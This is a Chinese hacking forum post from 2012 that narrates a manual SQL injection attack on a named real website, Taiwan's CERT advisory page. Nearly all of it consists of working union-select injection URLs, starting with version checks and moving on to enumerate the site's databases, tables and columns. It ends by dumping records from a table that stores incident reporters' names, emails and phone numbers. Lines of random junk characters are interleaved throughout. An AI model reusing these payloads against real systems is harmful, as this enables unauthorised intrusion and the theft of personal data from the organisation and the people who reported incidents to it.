1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询
7 A$ f3 e8 R/ {+ m2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
# X- c# D, W! {7 i6 o* q# ihttp://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--4 }5 R* a$ s: ^7 V3 q" }
3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--5 @6 e. a! ^, y6 K0 F
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。
: H; L0 s. d/ p3 S' v3 |+ B/ v4.判断有没有写权限/ ?0 j+ P0 ^' w/ Q Q% m
http://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限
3 R. C7 f- o" h没办法,手动猜表啦
6 s/ q7 e& t) u' x; |5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
5 E$ Q0 v6 ^) K% @4 x2 v但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
7 M! X' J( Q6 L6 |' whttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
( W% a) R1 E2 K& l, ~) s8 ^- k成功查出所有数据库,国外的黑客就是不一般。数据库如下:
U; _; h. u, h6 N4 B. C* Q. ninformation_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb
Q2 Q# S& ~+ z3 ]! z0 l6.爆表,爆的是twcert库
: W* l- i) s& |7 _7 |9 g) a6 `3 mhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--* o/ I; `0 R7 X' f% F [
爆出如下表; o2 L' A4 j& x! d: F' i1 W2 B8 v
downloadfile,irsys,newsdata,secrpt,secrpt_big5
4 G) I& G( h) g6 F6 q2 l- r/ v7.爆列名,这次爆的是irsys表
% r6 I. l. j5 Y( ehttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
* o( A# b6 B- x- D. P( Q g爆出如下列
f9 A3 U$ ~ h9 P2 b4 Pir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status1 N6 S( w$ Y6 }$ C* ~; V. R. U- R# y* W
8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。$ g# o Z; V( n" S9 I
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
_# {; `" M$ Y8 ~) D7 i l+ D$ e( U返回是3,说明每个列里有3个地段: j) I% m2 d( Z- S$ m7 A
9.爆字段内容& `$ ~% D9 C6 u& A4 E8 k$ {# j/ n
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--! [) r$ x1 c4 d
爆出name列的第一个字段的内容
) Z1 j, r) Z& e3 ]9 S4 Uhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
7 x/ R/ H& }6 r% X! Q2 j爆出name列的第二个字段的内容 |
发表于 2012-9-13 17:57:04
收藏
支持
反对